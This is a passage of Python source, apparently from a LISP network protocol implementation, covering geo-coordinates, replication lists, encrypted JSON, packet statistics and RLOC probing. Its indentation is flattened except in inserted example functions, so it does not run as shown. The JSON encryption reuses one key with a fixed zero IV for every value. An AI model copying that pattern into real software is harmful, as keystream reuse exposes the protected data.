dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_long = dd
return((dd_lat, dd_long))
#enddef
def get_distance(self, geo_point):
dd_prefix = self.dms_to_decimal()
dd_point = geo_point.dms_to_decimal()
distance = geopy.distance.distance(dd_prefix, dd_point)
return(distance.km)
#enddef
def point_in_circle(self, geo_point):
km = self.get_distance(geo_point)
return(km <= self.radius)
#enddef
def encode_geo(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
geo_len = socket.htons(20 + 2)
flags = 0
lat = abs(self.latitude)
lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
if (self.latitude < 0): flags |= 0x40
lon = abs(self.longitude)
lon_ms = ((self.long_mins * 60) + self.long_secs) * 1000
if (self.longitude < 0): flags |= 0x20
alt = 0
if (self.no_geo_altitude() == False):
alt = socket.htonl(self.altitude)
flags |= 0x10
#endif
radius = socket.htons(self.radius)
if (radius != 0): flags |= 0x06
pkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_GEO_COORD_TYPE,
0, geo_len)
pkt += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat, lat_ms >> 16,
socket.htons(lat_ms & 0x0ffff), lon, lon_ms >> 16,
socket.htons(lon_ms & 0xffff), alt, radius, 0, 0)
return(pkt)
#enddef
def decode_geo(self, packet, lcaf_len, radius_hi):
packet_format = "BBHBBHBBHIHHH"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
flags, r1, uncertainty, lat, lat_hi, lat_ms, lon, lon_hi, lon_ms, \
alt, radius, r2, afi = struct.unpack(packet_format,
packet[:format_size])
#
# No nested LCAFs in Geo-Coord type.
#
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
if (flags & 0x40): lat = -lat
self.latitude = lat
lat_secs = old_div(((lat_hi << 16) | socket.ntohs(lat_ms)), 1000)
self.lat_mins = old_div(lat_secs, 60)
self.lat_secs = lat_secs % 60
if (flags & 0x20): lon = -lon
self.longitude = lon
lon_secs = old_div(((lon_hi << 16) | socket.ntohs(lon_ms)), 1000)
self.long_mins = old_div(lon_secs, 60)
self.long_secs = lon_secs % 60
self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
radius = socket.ntohs(radius)
self.radius = radius if (flags & 0x02) else radius * 1000
self.geo_name = None
packet = packet[format_size::]
if (afi != 0):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
return(packet)
#enddef
#endclass
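#
# Illustrative sketch (added for exposition; not called anywhere in this
# file): parse a geo-prefix string of the form
# dd-mm-ss-[NS]-ddd-mm-ss-[EW]-altitude/radius and convert it to signed
# decimal degrees. The coordinates are made-up; internally North/East
# are stored negative, while dms_to_decimal() returns the conventional
# North-positive/West-negative form.
#
def lisp_geo_example():
    geo = lisp_geo("example-geo")
    geo.parse_geo_string("37-23-30-N-121-57-20-W-10/50")
    return(geo.dms_to_decimal())   # approximately (37.39, -121.96)
#enddef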
#
# Structure for Replication List Entries.
#
class lisp_rle_node(object):
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.level = 0
self.translated_port = 0
self.rloc_name = None
#enddef
def copy_rle_node(self):
rle_node = lisp_rle_node()
rle_node.address.copy_address(self.address)
rle_node.level = self.level
rle_node.translated_port = self.translated_port
rle_node.rloc_name = self.rloc_name
return(rle_node)
#enddef
def store_translated_rloc(self, rloc, port):
self.address.copy_address(rloc)
self.translated_port = port
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.address.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
#endclass
class lisp_rle(object):
def __init__(self, name):
self.rle_name = name
self.rle_nodes = []
self.rle_forwarding_list = []
#enddef
def copy_rle(self):
rle = lisp_rle(self.rle_name)
for rle_node in self.rle_nodes:
rle.rle_nodes.append(rle_node.copy_rle_node())
#endfor
rle.build_forwarding_list()
return(rle)
#enddef
def print_rle(self, html, do_formatting):
rle_str = ""
for rle_node in self.rle_nodes:
port = rle_node.translated_port
rle_name_str = ""
if (rle_node.rloc_name != None):
rle_name_str = rle_node.rloc_name
if (do_formatting): rle_name_str = blue(rle_name_str, html)
rle_name_str = "({})".format(rle_name_str)
#endif
addr_str = rle_node.address.print_address_no_iid()
if (rle_node.address.is_local()): addr_str = red(addr_str, html)
rle_str += "{}{}{}, ".format(addr_str, "" if port == 0 else \
":" + str(port), rle_name_str)
#endfor
return(rle_str[0:-2] if rle_str != "" else "")
#enddef
def build_forwarding_list(self):
level = -1
for rle_node in self.rle_nodes:
if (level == -1):
if (rle_node.address.is_local()): level = rle_node.level
else:
if (rle_node.level > level): break
#endif
#endfor
level = 0 if level == -1 else rle_node.level
self.rle_forwarding_list = []
for rle_node in self.rle_nodes:
if (rle_node.level == level or (level == 0 and
rle_node.level == 128)):
if (lisp_i_am_rtr == False and rle_node.address.is_local()):
addr_str = rle_node.address.print_address_no_iid()
lprint("Exclude local RLE RLOC {}".format(addr_str))
continue
#endif
self.rle_forwarding_list.append(rle_node)
#endif
#endfor
#enddef
#endclass
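#
# Illustrative sketch (added for exposition; not called anywhere in this
# file): build a 2-node replication list and render it. Level 0 nodes
# replicate first; build_forwarding_list() selects the level this system
# forwards to (level 0 when no RLE RLOC is local). Output shown assumes
# neither made-up RLOC is a local address.
#
def lisp_rle_example():
    rle = lisp_rle("example-rle")
    for addr_str, level in [("1.1.1.1", 0), ("2.2.2.2", 128)]:
        rle_node = lisp_rle_node()
        rle_node.address.store_address(addr_str)
        rle_node.level = level
        rle.rle_nodes.append(rle_node)
    #endfor
    rle.build_forwarding_list()
    return(rle.print_rle(False, False))   # "1.1.1.1, 2.2.2.2"
#enddef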
class lisp_json(object):
def __init__(self, name, string, encrypted=False, ms_encrypt=False):
#
# Deal with py3.
#
if (type(string) == bytes): string = string.decode()
self.json_name = name
self.json_encrypted = False
try:
json.loads(string)
except:
lprint("Invalid JSON string: '{}'".format(string))
string = '{ "?" : "?" }'
#endtry
self.json_string = string
#
# Decide to encrypt or decrypt. The map-server encrypts and stores
# ciphertext in mapping system. The lig client decrypts to show user
# data if it has the key in env variable LISP_JSON_KEY. Format of
# env variable is "<key>" or "[<key-id>]<key>".
#
# If the LISP site-eid is not configured to encrypt the JSON, then
# store in plaintext.
#
if (len(lisp_ms_json_keys) != 0):
if (ms_encrypt == False): return
self.json_key_id = list(lisp_ms_json_keys.keys())[0]
self.json_key = lisp_ms_json_keys[self.json_key_id]
self.encrypt_json()
#endif
if (lisp_log_id == "lig" and encrypted):
key = os.getenv("LISP_JSON_KEY")
if (key != None):
index = -1
if (key[0] == "[" and "]" in key):
index = key.find("]")
self.json_key_id = int(key[1:index])
#endif
self.json_key = key[index+1::]
#endif
self.decrypt_json()
#endif
#endif
#enddef
def add(self):
self.delete()
lisp_json_list[self.json_name] = self
#enddef
def delete(self):
if (self.json_name in lisp_json_list):
del(lisp_json_list[self.json_name])
lisp_json_list[self.json_name] = None
#endif
#enddef
def print_json(self, html):
good_string = self.json_string
bad = "***"
if (html): bad = red(bad, html)
bad_string = bad + self.json_string + bad
if (self.valid_json()): return(good_string)
return(bad_string)
#enddef
def valid_json(self):
try:
json.loads(self.json_string)
except:
return(False)
#endtry
return(True)
#enddef
def encrypt_json(self):
ekey = self.json_key.zfill(32)
iv = "0" * 8
jd = json.loads(self.json_string)
for key in jd:
value = jd[key]
if (type(value) != str): value = str(value)
value = chacha.ChaCha(ekey, iv).encrypt(value)
jd[key] = binascii.hexlify(value)
#endfor
self.json_string = json.dumps(jd)
self.json_encrypted = True
#enddef
def decrypt_json(self):
ekey = self.json_key.zfill(32)
iv = "0" * 8
jd = json.loads(self.json_string)
for key in jd:
value = binascii.unhexlify(jd[key])
jd[key] = chacha.ChaCha(ekey, iv).encrypt(value)
#endfor
try:
self.json_string = json.dumps(jd)
self.json_encrypted = False
except:
pass
#endtry
#enddef
#endclass
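#
# Illustrative sketch (added for exposition; not called anywhere in this
# file): ChaCha is a stream cipher, so encrypting twice with the same
# key/IV returns the plaintext; that is why decrypt_json() above reuses
# encrypt(). Assumes the chacha module this file already uses accepts
# the same string arguments it is passed above.
#
def lisp_json_chacha_roundtrip_example():
    ekey = "example-key".zfill(32)
    iv = "0" * 8
    ciphertext = chacha.ChaCha(ekey, iv).encrypt("some-plaintext")
    plaintext = chacha.ChaCha(ekey, iv).encrypt(ciphertext)
    return(plaintext == "some-plaintext")
#enddef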
#
# LISP forwarding stats info.
#
class lisp_stats(object):
def __init__(self):
self.packet_count = 0
self.byte_count = 0
self.last_rate_check = 0
self.last_packet_count = 0
self.last_byte_count = 0
self.last_increment = None
#enddef
def increment(self, octets):
self.packet_count += 1
self.byte_count += octets
self.last_increment = lisp_get_timestamp()
#enddef
def recent_packet_sec(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 1)
#enddef
def recent_packet_min(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 60)
#enddef
def stat_colors(self, c1, c2, html):
if (self.recent_packet_sec()):
return(green_last_sec(c1), green_last_sec(c2))
#endif
if (self.recent_packet_min()):
return(green_last_min(c1), green_last_min(c2))
#endif
return(c1, c2)
#enddef
def normalize(self, count):
count = str(count)
digits = len(count)
if (digits > 12):
count = count[0:-10] + "." + count[-10:-7] + "T"
return(count)
#endif
if (digits > 9):
count = count[0:-9] + "." + count[-9:-7] + "B"
return(count)
#endif
if (digits > 6):
count = count[0:-6] + "." + count[-6] + "M"
return(count)
#endif
return(count)
#enddef
def get_stats(self, summary, html):
last_rate = self.last_rate_check
last_packets = self.last_packet_count
last_bytes = self.last_byte_count
self.last_rate_check = lisp_get_timestamp()
self.last_packet_count = self.packet_count
self.last_byte_count = self.byte_count
rate_diff = self.last_rate_check - last_rate
if (rate_diff == 0):
packet_rate = 0
bit_rate = 0
else:
packet_rate = int(old_div((self.packet_count - last_packets),
rate_diff))
bit_rate = old_div((self.byte_count - last_bytes), rate_diff)
bit_rate = old_div((bit_rate * 8), 1000000)
bit_rate = round(bit_rate, 2)
#endif
#
# Normalize and put in string form.
#
packets = self.normalize(self.packet_count)
bc = self.normalize(self.byte_count)
#
# The summary version displays the packet/byte counts as the title
# string, with the rates shown in a pull-down html menu.
#
if (summary):
h = "<br>" if html else ""
packets, bc = self.stat_colors(packets, bc, html)
title = "packet-count: {}{}byte-count: {}".format(packets, h, bc)
stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format( \
packet_rate, bit_rate)
if (html != ""): stats = lisp_span(title, stats)
else:
prate = str(packet_rate)
brate = str(bit_rate)
if (html):
packets = lisp_print_cour(packets)
prate = lisp_print_cour(prate)
bc = lisp_print_cour(bc)
brate = lisp_print_cour(brate)
#endif
h = "<br>" if html else ", "
stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " + \
"{}{}bit-rate: {} mbps").format(packets, h, prate, h, bc, h,
brate)
#endif
return(stats)
#enddef
#endclass
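#
# Illustrative sketch (added for exposition; not called anywhere in this
# file): normalize() renders large counters with M/B/T suffixes for
# display.
#
def lisp_stats_normalize_example():
    stats = lisp_stats()
    # Returns ["999", "1.2M", "9.87B"] for these inputs.
    return([stats.normalize(999), stats.normalize(1234567),
        stats.normalize(9876543210)])
#enddef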
#
# ETR/RTR decapsulation total packet and error stats. Anytime a
# lisp_packet().packet_error value is added, this dictionary needs a
# corresponding key string added.
#
lisp_decap_stats = {
"good-packets" : lisp_stats(), "ICV-error" : lisp_stats(),
"checksum-error" : lisp_stats(), "lisp-header-error" : lisp_stats(),
"no-decrypt-key" : lisp_stats(), "bad-inner-version" : lisp_stats(),
"outer-header-error" : lisp_stats()
}
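#
# Illustrative sketch (added for exposition; not called anywhere in this
# file): decap code classifies each packet and bumps the matching
# counter, e.g. for a packet that passed all checks:
#
def lisp_decap_stats_example(packet_length):
    lisp_decap_stats["good-packets"].increment(packet_length)
    return(lisp_decap_stats["good-packets"].packet_count)
#enddef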
#
# This is a locator record definition as defined in the LISP RFCs.
#
class lisp_rloc(object):
def __init__(self, recurse=True):
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_name = None
self.interface = None
self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.translated_port = 0
self.priority = 255
self.weight = 0
self.mpriority = 255
self.mweight = 0
self.uptime = lisp_get_timestamp()
self.state = LISP_RLOC_UP_STATE
self.last_state_change = None
self.rle_name = None
self.elp_name = None
self.geo_name = None
self.json_name = None
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.stats = lisp_stats()
self.last_rloc_probe = None
self.last_rloc_probe_reply = None
self.rloc_probe_rtt = -1
self.recent_rloc_probe_rtts = [-1, -1, -1]
self.rloc_probe_hops = "?/?"
self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
self.rloc_probe_latency = "?/?"
self.recent_rloc_probe_latencies = ["?/?", "?/?", "?/?"]
self.last_rloc_probe_nonce = 0
self.echo_nonce_capable = False
self.map_notify_requested = False
self.rloc_next_hop = None
self.next_rloc = None
self.multicast_rloc_probe_list = {}
if (recurse == False): return
#
# This is for a box with multiple egress interfaces. We create an
# rloc chain, one for each <device, nh> tuple. So we can RLOC-probe
# individually.
#
next_hops = lisp_get_default_route_next_hops()
if (next_hops == [] or len(next_hops) == 1): return
self.rloc_next_hop = next_hops[0]
last = self
for nh in next_hops[1::]:
hop = copy.deepcopy(self)
hop.rloc_next_hop = nh
last.next_rloc = hop
last = hop
#endfor
#enddef
def up_state(self):
return(self.state == LISP_RLOC_UP_STATE)
#enddef
def unreach_state(self):
return(self.state == LISP_RLOC_UNREACH_STATE)
#enddef
def no_echoed_nonce_state(self):
return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)
#enddef
def down_state(self):
return(self.state in \
[LISP_RLOC_DOWN_STATE, LISP_RLOC_ADMIN_DOWN_STATE])
#enddef
def print_state(self):
if (self.state is LISP_RLOC_UNKNOWN_STATE):
return("unknown-state")
if (self.state is LISP_RLOC_UP_STATE):
return("up-state")
if (self.state is LISP_RLOC_DOWN_STATE):
return("down-state")
if (self.state is LISP_RLOC_ADMIN_DOWN_STATE):
return("admin-down-state")
if (self.state is LISP_RLOC_UNREACH_STATE):
return("unreach-state")
if (self.state is LISP_RLOC_NO_ECHOED_NONCE_STATE):
return("no-echoed-nonce-state")
return("invalid-state")
#enddef
def print_rloc(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
red(self.rloc.print_address(), False), ts, self.print_state(),
self.priority, self.weight, self.mpriority, self.mweight))
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def store_rloc_from_record(self, rloc_record, nonce, source):
port = LISP_DATA_PORT
self.rloc.copy_address(rloc_record.rloc)
if (rloc_record.rloc_name != None):
self.rloc_name = rloc_record.rloc_name
#endif
#
# Store translated port if RLOC was translated by a NAT.
#
rloc = self.rloc
if (rloc.is_null() == False):
nat_info = lisp_get_nat_info(rloc, self.rloc_name)
if (nat_info):
port = nat_info.port
head = lisp_nat_state_info[self.rloc_name][0]
addr_str = rloc.print_address_no_iid()
rloc_str = red(addr_str, False)
rloc_nstr = "" if self.rloc_name == None else \
blue(self.rloc_name, False)
#
# Don't use timed-out state. And check if the RLOC from the
# RLOC-record is different than the youngest NAT state.
#
if (nat_info.timed_out()):
lprint((" Matched stored NAT state timed out for " + \
"RLOC {}:{}, {}").format(rloc_str, port, rloc_nstr))
nat_info = None if (nat_info == head) else head
if (nat_info and nat_info.timed_out()):
port = nat_info.port
rloc_str = red(nat_info.address, False)
lprint((" Youngest stored NAT state timed out " + \
" for RLOC {}:{}, {}").format(rloc_str, port,
rloc_nstr))
nat_info = None
#endif
#endif
#
# Check to see if the RLOC for the map-cache is the same RLOC as in
# the NAT state info.
#
if (nat_info):
if (nat_info.address != addr_str):
lprint("RLOC conflict, RLOC-record {}, NAT state {}". \
format(rloc_str, red(nat_info.address, False)))
self.rloc.store_address(nat_info.address)
#endif
rloc_str = red(nat_info.address, False)
port = nat_info.port
lprint(" Use NAT translated RLOC {}:{} for {}". \
format(rloc_str, port, rloc_nstr))
self.store_translated_rloc(rloc, port)
#endif
#endif
#endif
self.geo = rloc_record.geo
self.elp = rloc_record.elp
self.json = rloc_record.json
#
# RLE nodes may be behind NATs too.
#
self.rle = rloc_record.rle
if (self.rle):
for rle_node in self.rle.rle_nodes:
rloc_name = rle_node.rloc_name
nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
if (nat_info == None): continue
port = nat_info.port
rloc_name_str = rloc_name
if (rloc_name_str): rloc_name_str = blue(rloc_name, False)
lprint((" Store translated encap-port {} for RLE-" + \
"node {}, rloc-name '{}'").format(port,
rle_node.address.print_address_no_iid(), rloc_name_str))
rle_node.translated_port = port
#endfor
#endif
self.priority = rloc_record.priority
self.mpriority = rloc_record.mpriority
self.weight = rloc_record.weight
self.mweight = rloc_record.mweight
if (rloc_record.reach_bit and rloc_record.local_bit and
rloc_record.probe_bit == False): self.state = LISP_RLOC_UP_STATE
#
# Store keys in RLOC lisp-crypto data structure.
#
rloc_is_source = source.is_exact_match(rloc_record.rloc) if \
source != None else None
if (rloc_record.keys != None and rloc_is_source):
key = rloc_record.keys[1]
if (key != None):
addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
str(port)
key.add_key_by_rloc(addr_str, True)
lprint(" Store encap-keys for nonce 0x{}, RLOC {}".format( \
lisp_hex_string(nonce), red(addr_str, False)))
#endif
#endif
return(port)
#enddef
def store_translated_rloc(self, rloc, port):
self.rloc.copy_address(rloc)
self.translated_rloc.copy_address(rloc)
self.translated_port = port
#enddef
def is_rloc_translated(self):
return(self.translated_rloc.is_null() == False)
#enddef
def rloc_exists(self):
if (self.rloc.is_null() == False): return(True)
if (self.rle_name or self.geo_name or self.elp_name or self.json_name):
return(False)
#endif
return(True)
#enddef
def is_rtr(self):
return((self.priority == 254 and self.mpriority == 255 and \
self.weight == 0 and self.mweight == 0))
#enddef
def print_state_change(self, new_state):
current_state = self.print_state()
string = "{} -> {}".format(current_state, new_state)
if (new_state == "up" and self.unreach_state()):
string = bold(string, False)
#endif
return(string)
#enddef
def print_rloc_probe_rtt(self):
if (self.rloc_probe_rtt == -1): return("none")
return(self.rloc_probe_rtt)
#enddef
def print_recent_rloc_probe_rtts(self):
rtts = str(self.recent_rloc_probe_rtts)
rtts = rtts.replace("-1", "?")
return(rtts)
#enddef
def compute_rloc_probe_rtt(self):
last = self.rloc_probe_rtt
self.rloc_probe_rtt = -1
if (self.last_rloc_probe_reply == None): return
if (self.last_rloc_probe == None): return
self.rloc_probe_rtt = self.last_rloc_probe_reply - self.last_rloc_probe
self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
last_list = self.recent_rloc_probe_rtts
self.recent_rloc_probe_rtts = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_hops(self):
return(self.rloc_probe_hops)
#enddef
def print_recent_rloc_probe_hops(self):
hops = str(self.recent_rloc_probe_hops)
return(hops)
#enddef
def store_rloc_probe_hops(self, to_hops, from_ttl):
if (to_hops == 0):
to_hops = "?"
elif (to_hops < old_div(LISP_RLOC_PROBE_TTL, 2)):
to_hops = "!"
else:
to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)
#endif
if (from_ttl < old_div(LISP_RLOC_PROBE_TTL, 2)):
from_hops = "!"
else:
from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)
#endif
last = self.rloc_probe_hops
self.rloc_probe_hops = to_hops + "/" + from_hops
last_list = self.recent_rloc_probe_hops
self.recent_rloc_probe_hops = [last] + last_list[0:-1]
#enddef
def store_rloc_probe_latencies(self, json_telemetry):
tel = lisp_decode_telemetry(json_telemetry)
fl = round(float(tel["etr-in"]) - float(tel["itr-out"]), 3)
rl = round(float(tel["itr-in"]) - float(tel["etr-out"]), 3)
last = self.rloc_probe_latency
self.rloc_probe_latency = str(fl) + "/" + str(rl)
last_list = self.recent_rloc_probe_latencies
self.recent_rloc_probe_latencies = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_latency(self):
return(self.rloc_probe_latency)
#enddef
def print_recent_rloc_probe_latencies(self):
latencies = str(self.recent_rloc_probe_latencies)
return(latencies)
#enddef
def process_rloc_probe_reply(self, ts, nonce, eid, group, hc, ttl, jt):
rloc = self
while (True):
if (rloc.last_rloc_probe_nonce == nonce): break
rloc = rloc.next_rloc
if (rloc == None):
lprint(" No matching nonce state found for nonce 0x{}". \
format(lisp_hex_string(nonce)))
return
#endif
#endwhile
#
# Compute RTTs.
#
rloc.last_rloc_probe_reply = ts
rloc.compute_rloc_probe_rtt()
state_string = rloc.print_state_change("up")
if (rloc.state != LISP_RLOC_UP_STATE):
lisp_update_rtr_updown(rloc.rloc, True)
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
mc = lisp_map_cache.lookup_cache(eid, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endif
#
# Store hops.
#
rloc.store_rloc_probe_hops(hc, ttl)
#
# Store one-way latency if telemetry data json in Map-Reply.
#
if (jt): rloc.store_rloc_probe_latencies(jt)
probe = bold("RLOC-probe reply", False)
addr_str = rloc.rloc.print_address_no_iid()
rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
p = ":{}".format(self.translated_port) if self.translated_port != 0 \
else ""
nh = ""
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
nh = ", nh {}({})".format(n, d)
#endif
lat = bold(rloc.print_rloc_probe_latency(), False)
lat = ", latency {}".format(lat) if jt else ""
e = green(lisp_print_eid_tuple(eid, group), False)
lprint((" Received {} from {}{} for {}, {}, rtt {}{}, " + \
"to-ttl/from-ttl {}{}").format(probe, red(addr_str, False), p, e,
state_string, rtt, nh, str(hc) + "/" + str(ttl), lat))
if (rloc.rloc_next_hop == None): return
#
# Now select better RTT next-hop.
#
rloc = None
install = None
while (True):
rloc = self if rloc == None else rloc.next_rloc
if (rloc == None): break
if (rloc.up_state() == False): continue
if (rloc.rloc_probe_rtt == -1): continue
if (install == None): install = rloc
if (rloc.rloc_probe_rtt < install.rloc_probe_rtt): install = rloc
#endwhile
if (install != None):
d, n = install.rloc_next_hop
nh = bold("nh {}({})".format(n, d), False)
lprint(" Install host-route via best {}".format(nh))
lisp_install_host_route(addr_str, None, False)
lisp_install_host_route(addr_str, n, True)
#endif
#enddef
def add_to_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (addr_str not in lisp_rloc_probe_list):
lisp_rloc_probe_list[addr_str] = []
#endif
if (group.is_null()): group.instance_id = 0
for r, e, g in lisp_rloc_probe_list[addr_str]:
if (e.is_exact_match(eid) and g.is_exact_match(group)):
if (r == self):
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
return
#endif
lisp_rloc_probe_list[addr_str].remove([r, e, g])
break
#endif
#endfor
lisp_rloc_probe_list[addr_str].append([self, eid, group])
#
# Copy reach/unreach state from first RLOC that the active RLOC-probing
# is run on.
#
rloc = lisp_rloc_probe_list[addr_str][0][0]
if (rloc.state == LISP_RLOC_UNREACH_STATE):
self.state = LISP_RLOC_UNREACH_STATE
self.last_state_change = lisp_get_timestamp()
#endif
#enddef
def delete_from_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (addr_str not in lisp_rloc_probe_list): return
array = []
for entry in lisp_rloc_probe_list[addr_str]:
if (entry[0] != self): continue
if (entry[1].is_exact_match(eid) == False): continue
if (entry[2].is_exact_match(group) == False): continue
array = entry
break
#endfor
if (array == []): return
try:
lisp_rloc_probe_list[addr_str].remove(array)
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
except:
return
#endtry
#enddef
def print_rloc_probe_state(self, trailing_linefeed):
output = ""
rloc = self
while (True):
sent = rloc.last_rloc_probe
if (sent == None): sent = 0
resp = rloc.last_rloc_probe_reply
if (resp == None): resp = 0
rtt = rloc.print_rloc_probe_rtt()
s = space(4)
if (rloc.rloc_next_hop == None):
output += "RLOC-Probing:\n"
else:
d, n = rloc.rloc_next_hop
output += "RLOC-Probing for nh {}({}):\n".format(n, d)
#endif
output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + \
"received: {}, rtt {}").format(s, lisp_print_elapsed(sent),
s, lisp_print_elapsed(resp), rtt)
if (trailing_linefeed): output += "\n"
rloc = rloc.next_rloc
if (rloc == None): break
output += "\n"
#endwhile
return(output)
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
def rloc_recent_rekey(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key == None): return(False)
if (key.last_rekey == None): return(True)
return(time.time() - key.last_rekey < 1)
except:
return(False)
#endtry
#enddef
#endclass
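#
# Illustrative sketch (added for exposition; not called anywhere in this
# file): an RTR is advertised with the distinguished priority/weight
# tuple 254/255/0/0, which is_rtr() above tests for. recurse=False
# avoids building the per-next-hop RLOC chain in __init__().
#
def lisp_rloc_is_rtr_example():
    rloc = lisp_rloc(False)
    rloc.priority = 254
    rloc.mpriority = 255
    rloc.weight = 0
    rloc.mweight = 0
    return(rloc.is_rtr())   # True
#enddef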
class lisp_mapping(object):
def __init__(self, eid, group, rloc_set):
self.eid = eid
if (eid == ""): self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = group
if (group == ""): self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_set = rloc_set
self.best_rloc_set = []
self.build_best_rloc_set()
self.uptime = lisp_get_timestamp()
self.action = LISP_NO_ACTION
self.expires = None
self.map_cache_ttl = None
self.register_ttl = LISP_REGISTER_TTL
self.last_refresh_time = self.uptime
self.source_cache = None
self.map_replies_sent = 0
self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.use_mr_name = "all"
self.use_ms_name = "all"
self.stats = lisp_stats()
self.dynamic_eids = None
self.checkpoint_entry = False
self.secondary_iid = None
self.signature_eid = False
self.gleaned = False
self.recent_sources = {}
self.last_multicast_map_request = 0
self.subscribed_eid = None
self.subscribed_group = None
#enddef
def print_mapping(self, eid_indent, rloc_indent):
ts = lisp_print_elapsed(self.uptime)
group = "" if self.group.is_null() else \
", group {}".format(self.group.print_prefix())
lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
green(self.eid.print_prefix(), False), group, ts,
len(self.rloc_set)))
for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.map_cache_ttl
if (ttl == None): return("forever")
if (ttl >= 3600):
if ((ttl % 3600) == 0):
ttl = str(old_div(ttl, 3600)) + " hours"
else:
ttl = str(old_div(ttl, 60)) + " mins"
#endif
elif (ttl >= 60):
if ((ttl % 60) == 0):
ttl = str(old_div(ttl, 60)) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def refresh(self):
if (self.group.is_null()): return(self.refresh_unicast())
return(self.refresh_multicast())
#enddef
def refresh_unicast(self):
return(self.is_active() and self.has_ttl_elapsed() and
self.gleaned == False)
#enddef
def refresh_multicast(self):
#
# Take uptime modulo TTL; when the value wraps to 0, 1, or 2 seconds
# (about once per TTL period), refresh the entry.
#
elapsed = int((time.time() - self.uptime) % self.map_cache_ttl)
refresh = (elapsed in [0, 1, 2])
if (refresh == False): return(False)
#
# Don't send a refreshing Map-Request if we just sent one.
#
rate_limit = ((time.time() - self.last_multicast_map_request) <= 2)
if (rate_limit): return(False)
self.last_multicast_map_request = lisp_get_timestamp()
return(True)
#enddef
def has_ttl_elapsed(self):
if (self.map_cache_ttl == None): return(False)
elapsed = time.time() - self.last_refresh_time
if (elapsed >= self.map_cache_ttl): return(True)
#
# TTL is about to elapse. We need to refresh the entry when the
# elapsed time reaches 90% of the TTL.
#
almost_ttl = self.map_cache_ttl - (old_div(self.map_cache_ttl, 10))
if (elapsed >= almost_ttl): return(True)
return(False)
#enddef
def is_active(self):
if (self.stats.last_increment == None): return(False)
elapsed = time.time() - self.stats.last_increment
return(elapsed <= 60)
#enddef
def match_eid_tuple(self, db):
if (self.eid.is_exact_match(db.eid) == False): return(False)
if (self.group.is_exact_match(db.group) == False): return(False)
return(True)
#enddef
def sort_rloc_set(self):
self.rloc_set.sort(key=operator.attrgetter('rloc.address'))
#enddef
def delete_rlocs_from_rloc_probe_list(self):
for rloc in self.best_rloc_set:
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def build_best_rloc_set(self):
old_best = self.best_rloc_set
self.best_rloc_set = []
if (self.rloc_set == None): return
#
# Get best priority for first up RLOC.
#
pr = 256
for rloc in self.rloc_set:
